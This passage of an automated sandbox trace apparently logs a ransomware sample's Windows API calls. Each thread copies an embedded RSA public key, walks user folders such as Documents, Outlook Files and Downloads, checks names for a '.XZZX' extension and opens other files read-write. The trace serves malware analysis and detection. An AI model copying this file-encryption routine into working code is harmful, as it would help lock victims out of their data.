lpWideCharStr="XZZX") returned 5 [0108.645] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\EA0DA0333E23BB069C42A5C142449F4E.XZZX") returned 118 [0108.645] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 319 os_tid = 0x5d4 [0108.805] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.805] lstrcpyW (in: lpString1=0x420f460, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0108.805] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.805] SetErrorMode (uMode=0x1) returned 0x1 [0108.805] lstrcpyW (in: lpString1=0x420f860, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0108.805] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9c5da82c, Data2=0x8625, Data3=0x4fe2, Data4=([0]=0xba, [1]=0x45, [2]=0xeb, [3]=0x5d, [4]=0xaf, [5]=0x98, [6]=0xb0, [7]=0x2e))) returned 0x0 [0108.805] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned 118 [0108.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.805] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\9F90565C29DBD7AA9C5DA82C2DFCBBF2.XZZX") returned 118 [0108.805] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 320 os_tid = 0x64 [0108.957] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.957] lstrcpyW (in: lpString1=0x420f460, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0108.957] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.957] SetErrorMode (uMode=0x1) returned 0x1 [0108.957] lstrcpyW (in: lpString1=0x420f860, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0108.957] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x959e3df5, Data2=0xf0ad, Data3=0x45b2, Data4=([0]=0x82, [1]=0xa6, [2]=0x59, [3]=0x9d, [4]=0x48, [5]=0x7c, [6]=0xdf, [7]=0xb4))) returned 0x0 [0108.957] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned 118 [0108.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0108.957] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\76058E914185F94A959E3DF545A6DD92.XZZX") returned 118 [0108.957] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 321 os_tid = 0x594 [0109.127] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.127] lstrcpyW (in: lpString1=0x420f460, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0109.127] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.127] SetErrorMode (uMode=0x1) returned 0x1 [0109.127] lstrcpyW (in: lpString1=0x420f860, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0109.127] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x79bac559, Data2=0xe65e, Data3=0x453b, Data4=([0]=0xaa, [1]=0xfc, [2]=0xa8, [3]=0x5, [4]=0x5c, [5]=0x72, [6]=0xcc, [7]=0xaa))) returned 0x0 [0109.127] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned 91 [0109.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.127] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\7FE26CAE3E4C6DAA79BAC559426D51F2.XZZX") returned 91 [0109.127] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 322 os_tid = 0x5cc [0109.269] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.269] lstrcpyW (in: lpString1=0x420f460, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0109.270] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0109.270] SetErrorMode (uMode=0x1) returned 0x1 [0109.270] lstrcpyW (in: lpString1=0x420f860, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0109.270] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xfa11b3df, Data2=0xc49f, Data3=0x4283, Data4=([0]=0x8e, [1]=0xdb, [2]=0xb0, [3]=0x92, [4]=0xde, [5]=0x26, [6]=0x95, [7]=0xbe))) returned 0x0 [0109.270] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0109.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.270] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\DEB5738133159B5DFA11B3DF37367FA5.XZZX") returned 91 [0109.270] StrStrW (lpFirst="Favorites.vss", lpSrch="XZZX") returned 0x0 [0109.270] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x20) returned 1 [0109.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0109.276] CreateFileMappingW (hFile=0x414, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 Thread: id = 323 os_tid = 0x804 [0109.430] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.430] lstrcpyW (in: lpString1=0x420f460, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0109.431] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0109.431] SetErrorMode (uMode=0x1) returned 0x1 [0109.431] lstrcpyW (in: lpString1=0x420f860, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0109.431] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x25c23f9, Data2=0x6ff7, Data3=0x4599, Data4=([0]=0x86, [1]=0xe3, [2]=0x7, [3]=0xd, [4]=0x34, [5]=0xfd, [6]=0xdb, [7]=0x99))) returned 0x0 [0109.431] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\7B7BA3C4205941180FE9457124712560.XZZX") returned 100 [0109.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.431] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\3A7FAC3F1E707D9F025C23F9229161E7.XZZX") returned 100 [0109.431] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 324 os_tid = 0x808 [0109.591] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.591] lstrcpyW (in: lpString1=0x420f460, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0109.591] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0109.591] SetErrorMode (uMode=0x1) returned 0x1 [0109.591] lstrcpyW (in: lpString1=0x420f860, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0109.591] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4a037af3, Data2=0x4ade, Data3=0x413f, Data4=([0]=0xbb, [1]=0x6f, [2]=0x5e, [3]=0x75, [4]=0xb2, [5]=0x72, [6]=0xca, [7]=0x19))) returned 0x0 [0109.591] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\7BA753503E40D4C00F297B124258B908.XZZX") returned 95 [0109.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.591] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\308EDCBA1314CAA24A037AF31735AEEA.XZZX") returned 95 [0109.591] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 325 os_tid = 0x80c [0109.743] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.743] lstrcpyW (in: lpString1=0x420f460, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0109.743] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0109.743] SetErrorMode (uMode=0x1) returned 0x1 [0109.743] lstrcpyW (in: lpString1=0x420f860, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0109.743] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa21381d2, Data2=0xdcfd, Data3=0x4ddd, Data4=([0]=0xae, [1]=0x84, [2]=0x6c, [3]=0x61, [4]=0xd1, [5]=0x36, [6]=0x18, [7]=0x4e))) returned 0x0 [0109.743] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned 81 [0109.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.743] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\F0D7C48A4336DF69A21381D24757C3B1.XZZX") returned 81 [0109.743] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 326 os_tid = 0x810 [0109.898] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.898] lstrcpyW (in: lpString1=0x420f460, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0109.898] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0109.898] SetErrorMode (uMode=0x1) returned 0x1 [0109.898] lstrcpyW (in: lpString1=0x420f860, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0109.898] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xabae6692, Data2=0xc942, Data3=0x4e91, Data4=([0]=0x83, [1]=0xa6, [2]=0x97, [3]=0xd5, [4]=0x51, [5]=0x27, [6]=0xde, [7]=0x83))) returned 0x0 [0109.898] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS 